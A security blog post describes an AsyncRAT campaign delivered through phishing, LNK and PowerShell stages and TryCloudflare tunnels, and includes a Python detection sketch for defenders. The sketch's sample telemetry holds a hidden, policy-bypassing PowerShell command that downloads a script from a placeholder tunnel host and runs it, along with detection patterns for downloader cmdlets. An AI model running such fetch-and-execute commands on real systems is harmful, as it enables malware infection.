Cybercriminals Are Getting Sneakier: How AsyncRAT is Exploiting Python and TryCloudflare

Cyber threats are getting smarter, and hackers are now using AsyncRAT, a powerful remote access trojan (RAT), along with Python payloads and TryCloudflare tunnels to launch stealth attacks.

How the Attack Works

According to cybersecurity researcher Jyotika Singh from Forcepoint X-Labs, the attack kicks off with a simple phishing email. Inside, there’s a Dropbox link that, once clicked, downloads a ZIP file. Inside that ZIP? A tricky little internet shortcut (URL) file that hides a Windows shortcut (LNK) file. While the victim sees a harmless-looking PDF document, the LNK file is busy pushing the infection further.

Here’s where it gets interesting—hackers are using TryCloudflare, a legit Cloudflare service that exposes web servers to the internet without opening ports. This lets them proxy traffic through a dedicated subdomain, keeping their movements hidden.

Once triggered, the LNK file runs a PowerShell script that downloads and executes malicious JavaScript, leading to a batch script (BAT) that pulls down another ZIP file. This final payload contains Python-based malware, which can install AsyncRAT, Venom RAT, and XWorm—dangerous tools that let attackers spy, steal data, and control infected systems.
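The chain above (shortcut file → PowerShell → script host → batch file → TryCloudflare tunnel) leaves a recognisable trail in endpoint telemetry. The following Python detection sketch is an added example, not code from the article, from Forcepoint, or from The Hacker News. It assumes Sysmon-style process-creation and DNS-query records flattened to dicts (the field names, the sample events, the regex heuristics and the two-stage threshold are all my assumptions), and it correlates the individual rule hits per host so that the stages of one infection are seen together rather than as isolated alerts.

```python
"""Detection sketch for the shortcut -> PowerShell -> JS/BAT -> TryCloudflare chain."""
import re
from collections import defaultdict

# Constructed sample telemetry (assumption: Sysmon-like field names).
# WS01 carries a stand-in for the chain the article describes; WS02 is benign.
EVENTS = [
    {"host": "WS01", "type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iwr "
                "https://placeholder-words.trycloudflare.com/a.js "
                "-OutFile $env:TEMP\\a.js; wscript $env:TEMP\\a.js\""},
    {"host": "WS01", "type": "process",
     "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\victim\AppData\Local\Temp\run.bat"},
    {"host": "WS01", "type": "dns", "query": "placeholder-words.trycloudflare.com"},
    {"host": "WS02", "type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Projects"},
    {"host": "WS02", "type": "dns", "query": "updates.example.com"},
]

# Heuristics (assumption): cmdlets that fetch remote content, flags that hide or
# unlock PowerShell, and the quick-tunnel domain TryCloudflare hands out.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(iwr|invoke-webrequest|iex|invoke-expression|downloadstring|"
    r"downloadfile|start-bitstransfer)\b", re.I)
EVASION_FLAGS = re.compile(
    r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy|p)\s+bypass|enc(odedcommand)?)\b", re.I)
TRYCLOUDFLARE = re.compile(r"(^|\.)trycloudflare\.com$", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def classify(event):
    """Return the names of the detection rules this single event triggers."""
    hits = []
    if event["type"] == "process":
        image = event["image"].lower()
        parent = event["parent"].lower()
        cmd = event["cmdline"]
        # A shortcut (URL/LNK) opened from Explorer starts PowerShell as a child
        # of explorer.exe; a downloader cmdlet or evasion flag makes it suspect.
        if (image.endswith("powershell.exe") and parent.endswith("explorer.exe")
                and (DOWNLOAD_CMDLETS.search(cmd) or EVASION_FLAGS.search(cmd))):
            hits.append("explorer_spawned_powershell_downloader")
        # The JavaScript stage runs under wscript/cscript and hands off to a BAT.
        if (image.endswith("cmd.exe")
                and parent.endswith(("wscript.exe", "cscript.exe"))
                and re.search(r"\.bat\b", cmd, re.I)):
            hits.append("script_host_runs_batch")
        # Any URL in the command line that points at a TryCloudflare quick tunnel.
        if any(TRYCLOUDFLARE.search(h) for h in URL_HOST.findall(cmd)):
            hits.append("trycloudflare_url_in_cmdline")
    elif event["type"] == "dns" and TRYCLOUDFLARE.search(event["query"]):
        hits.append("trycloudflare_lookup")
    return hits


def score_hosts(events):
    """Group rule hits per host so the stages of one chain are seen together."""
    per_host = defaultdict(set)
    for ev in events:
        for rule in classify(ev):
            per_host[ev["host"]].add(rule)
    return {host: sorted(rules) for host, rules in per_host.items()}


def suspected_chain(events, min_rules=2):
    """Hosts where at least min_rules distinct stages fired (threshold is an assumption)."""
    return sorted(h for h, rules in score_hosts(events).items() if len(rules) >= min_rules)


if __name__ == "__main__":
    for host, rules in score_hosts(EVENTS).items():
        print(host, rules)
    print("suspected:", suspected_chain(EVENTS))
```

A single rule on its own (a TryCloudflare lookup, say) is a weak signal, since the service has legitimate users; the value of this approach is that the shortcut-to-PowerShell launch, the script host handing off to a batch file, and the tunnel domain all come from different stages, so requiring two or more of them on the same host trims false positives while still catching the chain early. In production the regexes would be replaced by the EDR's own query language, but the per-host correlation is the part worth keeping.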

Not Their First Rodeo

This isn’t the first time AsyncRAT has been used in cyberattacks. A similar campaign was spotted last year, spreading AsyncRAT alongside GuLoader, PureLogs Stealer, Remcos RAT, and Venom RAT. Even worse, hackers have exploited CVE-2024-38213, a now-patched Windows Mark-of-the-Web (MotW) bypass vulnerability, making their attacks even harder to detect.

By using trusted services like Dropbox and TryCloudflare, cybercriminals make their attacks look more legitimate, tricking victims into downloading malware without suspicion.

The Rise of Phishing-as-a-Service

This campaign is part of a growing trend where hackers use Phishing-as-a-Service (PhaaS) toolkits to take over accounts by directing users to fake login pages that look just like Microsoft, Google, Apple, or GitHub.

Some recent phishing scams include:

  • Fake legal documents and receipts to deliver SapphireRAT in Latin America.
  • Credential harvesting pages hosted on government (“.gov”) domains to steal Microsoft 365 logins.
  • Impersonation of tax agencies in Australia, Switzerland, the UK, and the US to steal user credentials and distribute malware.
  • Spoofed Microsoft ADFS login pages designed to steal login details and bypass multi-factor authentication (MFA).
  • Cloudflare Workers (workers.dev) hosting fake login pages mimicking major online services.
  • Employment contract scams targeting German companies using the Sliver implant.
  • Clever phishing tricks that bypass security using invisible characters in emails.
  • Scareware and unwanted programs (PUPs) disguised as legitimate links in a campaign called ApateWeb.

Even Trusted Platforms Aren’t Safe

A recent study by CloudSEK exposed how attackers are exploiting Zendesk’s infrastructure to run phishing scams. Hackers sign up for a free Zendesk trial, register a subdomain, and use it to send fake customer service emails. Since Zendesk doesn’t verify these emails, attackers can easily phish unsuspecting victims.

What Can You Do?

Cybercriminals are getting craftier, and no one is safe without the right protections. Businesses and individuals should:

  • Avoid clicking on suspicious links, even from seemingly trusted sources.
  • Use email authentication and endpoint protection to detect phishing attempts.
  • Stay informed about the latest threats to recognize new attack methods.

For a deeper dive into this attack, check out the full report on The Hacker News. Stay vigilant and stay safe!

References:
Lakshmanan, R. (2025, February 5). AsyncRAT campaign uses Python payloads and TryCloudflare tunnels for stealth attacks. The Hacker News. https://thehackernews.com/2025/02/asyncrat-campaign-uses-python-payloads.html